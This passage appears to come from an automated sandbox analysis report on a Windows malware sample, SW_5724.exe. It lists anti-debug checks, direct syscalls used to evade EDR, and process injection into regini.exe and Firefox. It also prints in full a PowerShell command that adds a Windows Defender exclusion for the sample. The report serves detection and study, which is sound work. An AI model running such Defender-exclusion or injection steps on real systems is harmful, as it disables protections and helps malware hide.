                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A72835 mov eax, dword ptr fs:[00000030h]6_2_01A72835
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A72835 mov eax, dword ptr fs:[00000030h]6_2_01A72835
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A72835 mov eax, dword ptr fs:[00000030h]6_2_01A72835
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A72835 mov ecx, dword ptr fs:[00000030h]6_2_01A72835
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A72835 mov eax, dword ptr fs:[00000030h]6_2_01A72835
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A72835 mov eax, dword ptr fs:[00000030h]6_2_01A72835
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF483A mov eax, dword ptr fs:[00000030h]6_2_01AF483A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF483A mov eax, dword ptr fs:[00000030h]6_2_01AF483A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A830 mov eax, dword ptr fs:[00000030h]6_2_01A8A830
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADC810 mov eax, dword ptr fs:[00000030h]6_2_01ADC810
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE6870 mov eax, dword ptr fs:[00000030h]6_2_01AE6870
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE6870 mov eax, dword ptr fs:[00000030h]6_2_01AE6870
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADE872 mov eax, dword ptr fs:[00000030h]6_2_01ADE872
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADE872 mov eax, dword ptr fs:[00000030h]6_2_01ADE872
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A62840 mov ecx, dword ptr fs:[00000030h]6_2_01A62840
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A54859 mov eax, dword ptr fs:[00000030h]6_2_01A54859
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A54859 mov eax, dword ptr fs:[00000030h]6_2_01A54859
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A80854 mov eax, dword ptr fs:[00000030h]6_2_01A80854
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B04BB0 mov eax, dword ptr fs:[00000030h]6_2_01B04BB0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B04BB0 mov eax, dword ptr fs:[00000030h]6_2_01B04BB0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60BBE mov eax, dword ptr fs:[00000030h]6_2_01A60BBE
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60BBE mov eax, dword ptr fs:[00000030h]6_2_01A60BBE
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58BF0 mov eax, dword ptr fs:[00000030h]6_2_01A58BF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58BF0 mov eax, dword ptr fs:[00000030h]6_2_01A58BF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58BF0 mov eax, dword ptr fs:[00000030h]6_2_01A58BF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7EBFC mov eax, dword ptr fs:[00000030h]6_2_01A7EBFC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADCBF0 mov eax, dword ptr fs:[00000030h]6_2_01ADCBF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50BCD mov eax, dword ptr fs:[00000030h]6_2_01A50BCD
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50BCD mov eax, dword ptr fs:[00000030h]6_2_01A50BCD
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50BCD mov eax, dword ptr fs:[00000030h]6_2_01A50BCD
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A70BCB mov eax, dword ptr fs:[00000030h]6_2_01A70BCB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A70BCB mov eax, dword ptr fs:[00000030h]6_2_01A70BCB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A70BCB mov eax, dword ptr fs:[00000030h]6_2_01A70BCB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFEBD0 mov eax, dword ptr fs:[00000030h]6_2_01AFEBD0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7EB20 mov eax, dword ptr fs:[00000030h]6_2_01A7EB20
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7EB20 mov eax, dword ptr fs:[00000030h]6_2_01A7EB20
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B18B28 mov eax, dword ptr fs:[00000030h]6_2_01B18B28
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B18B28 mov eax, dword ptr fs:[00000030h]6_2_01B18B28
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACEB1D mov eax, dword ptr fs:[00000030h]6_2_01ACEB1D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24B00 mov eax, dword ptr fs:[00000030h]6_2_01B24B00
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4CB7E mov eax, dword ptr fs:[00000030h]6_2_01A4CB7E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B22B57 mov eax, dword ptr fs:[00000030h]6_2_01B22B57
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B22B57 mov eax, dword ptr fs:[00000030h]6_2_01B22B57
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B22B57 mov eax, dword ptr fs:[00000030h]6_2_01B22B57
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B22B57 mov eax, dword ptr fs:[00000030h]6_2_01B22B57
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF8B42 mov eax, dword ptr fs:[00000030h]6_2_01AF8B42
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE6B40 mov eax, dword ptr fs:[00000030h]6_2_01AE6B40
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE6B40 mov eax, dword ptr fs:[00000030h]6_2_01AE6B40
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1AB40 mov eax, dword ptr fs:[00000030h]6_2_01B1AB40
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A48B50 mov eax, dword ptr fs:[00000030h]6_2_01A48B50
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B04B4B mov eax, dword ptr fs:[00000030h]6_2_01B04B4B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B04B4B mov eax, dword ptr fs:[00000030h]6_2_01B04B4B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFEB50 mov eax, dword ptr fs:[00000030h]6_2_01AFEB50
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58AA0 mov eax, dword ptr fs:[00000030h]6_2_01A58AA0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58AA0 mov eax, dword ptr fs:[00000030h]6_2_01A58AA0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AA6AA4 mov eax, dword ptr fs:[00000030h]6_2_01AA6AA4
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5EA80 mov eax, dword ptr fs:[00000030h]6_2_01A5EA80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5EA80 mov eax, dword ptr fs:[00000030h]6_2_01A5EA80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5EA80 mov eax, dword ptr fs:[00000030h]6_2_01A5EA80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5EA80 mov eax, dword ptr fs:[00000030h]6_2_01A5EA80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5EA80 mov eax, dword ptr fs:[00000030h]6_2_01A5EA80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5EA80 mov eax, dword ptr fs:[00000030h]6_2_01A5EA80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5EA80 mov eax, dword ptr fs:[00000030h]6_2_01A5EA80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5EA80 mov eax, dword ptr fs:[00000030h]6_2_01A5EA80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5EA80 mov eax, dword ptr fs:[00000030h]6_2_01A5EA80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24A80 mov eax, dword ptr fs:[00000030h]6_2_01B24A80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A88A90 mov edx, dword ptr fs:[00000030h]6_2_01A88A90
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8AAEE mov eax, dword ptr fs:[00000030h]6_2_01A8AAEE
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8AAEE mov eax, dword ptr fs:[00000030h]6_2_01A8AAEE
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AA6ACC mov eax, dword ptr fs:[00000030h]6_2_01AA6ACC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AA6ACC mov eax, dword ptr fs:[00000030h]6_2_01AA6ACC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AA6ACC mov eax, dword ptr fs:[00000030h]6_2_01AA6ACC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50AD0 mov eax, dword ptr fs:[00000030h]6_2_01A50AD0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A84AD0 mov eax, dword ptr fs:[00000030h]6_2_01A84AD0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A84AD0 mov eax, dword ptr fs:[00000030h]6_2_01A84AD0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7EA2E mov eax, dword ptr fs:[00000030h]6_2_01A7EA2E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8CA24 mov eax, dword ptr fs:[00000030h]6_2_01A8CA24
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8CA38 mov eax, dword ptr fs:[00000030h]6_2_01A8CA38
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A74A35 mov eax, dword ptr fs:[00000030h]6_2_01A74A35
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A74A35 mov eax, dword ptr fs:[00000030h]6_2_01A74A35
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADCA11 mov eax, dword ptr fs:[00000030h]6_2_01ADCA11
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8CA6F mov eax, dword ptr fs:[00000030h]6_2_01A8CA6F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8CA6F mov eax, dword ptr fs:[00000030h]6_2_01A8CA6F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8CA6F mov eax, dword ptr fs:[00000030h]6_2_01A8CA6F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFEA60 mov eax, dword ptr fs:[00000030h]6_2_01AFEA60
                Source: C:\Users\user\Desktop\SW_5724.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\SW_5724.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe"
                Source: C:\Users\user\Desktop\SW_5724.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: NULL target: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread register set: target process: 7084Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread APC queued: target process: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess created: C:\Users\user\Desktop\SW_5724.exe "C:\Users\user\Desktop\SW_5724.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess created: C:\Users\user\Desktop\SW_5724.exe "C:\Users\user\Desktop\SW_5724.exe"Jump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: BmUrsTIvMw.exe, 00000009.00000000.2257604704.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000002.4515119989.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515350775.0000000001221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: BmUrsTIvMw.exe, 00000009.00000000.2257604704.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000002.4515119989.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515350775.0000000001221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: BmUrsTIvMw.exe, 00000009.00000000.2257604704.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000002.4515119989.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515350775.0000000001221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: BmUrsTIvMw.exe, 00000009.00000000.2257604704.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000002.4515119989.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515350775.0000000001221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SW_5724.exeQueries volume information: C:\Users\user\Desktop\SW_5724.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
